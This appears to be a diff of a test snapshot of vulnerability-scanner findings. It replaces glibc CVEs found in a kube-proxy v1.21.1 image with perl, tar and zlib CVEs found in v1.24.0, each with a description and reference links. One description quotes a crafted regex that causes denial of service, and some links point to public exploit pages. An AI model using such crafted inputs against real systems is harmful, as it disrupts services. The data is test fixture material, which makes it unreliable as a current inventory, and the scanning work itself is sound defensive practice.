+ "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-27618", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-27618", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - "https://linux.oracle.com/cve/CVE-2020-27618.html", - "https://linux.oracle.com/errata/ELSA-2021-9344.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210401-0006/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", - "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5768-1", - "https://www.cve.org/CVERecord?id=CVE-2020-27618", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", ], }, "category": "Vulnerability", - "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "description": "CPAN 2.28 allows Signature Verification Bypass.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-27618", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-27618", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5768-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://github.com/andk/cpanpm/pull/175", + }, + { + "type": "URL", + "value": "https://metacpan.org/dist/CPAN/changes", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6112-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6112-2", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, ], "severity": "LOW", @@ -155459,57 +156045,67 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + "https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standa ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", + }, + { + "type": "URL", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, ], "severity": "LOW", @@ -155517,62 +156113,47 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "name": "tar: does not properly warn the user when extracting setuid or setgid files", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, ], "severity": "LOW", @@ -155580,692 +156161,599 @@ and the severity is therefore considered low.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19126", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1:1.2.11.dfsg-2+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-37434", + "installedVersion": "1:1.2.11.dfsg-2", + "packageName": "zlib1g", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19126", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", - "https://linux.oracle.com/cve/CVE-2019-19126.html", - "https://linux.oracle.com/errata/ELSA-2020-3861.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", - "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", - "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", - "https://ubuntu.com/security/notices/USN-4416-1", - "https://usn.ubuntu.com/4416-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-19126", + "http://seclists.org/fulldisclosure/2022/Oct/37", + "http://seclists.org/fulldisclosure/2022/Oct/38", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "http://seclists.org/fulldisclosure/2022/Oct/42", + "http://www.openwall.com/lists/oss-security/2022/08/05/2", + "http://www.openwall.com/lists/oss-security/2022/08/09/1", + "https://access.redhat.com/errata/RHSA-2022:8291", + "https://access.redhat.com/security/cve/CVE-2022-37434", + "https://bugzilla.redhat.com/2116639", + "https://bugzilla.redhat.com/show_bug.cgi?id=2053198", + "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "https://errata.rockylinux.org/RLSA-2022:8291", + "https://github.com/curl/curl/issues/9271", + "https://github.com/ivd38/zlib_overflow", + "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "https://linux.oracle.com/cve/CVE-2022-37434.html", + 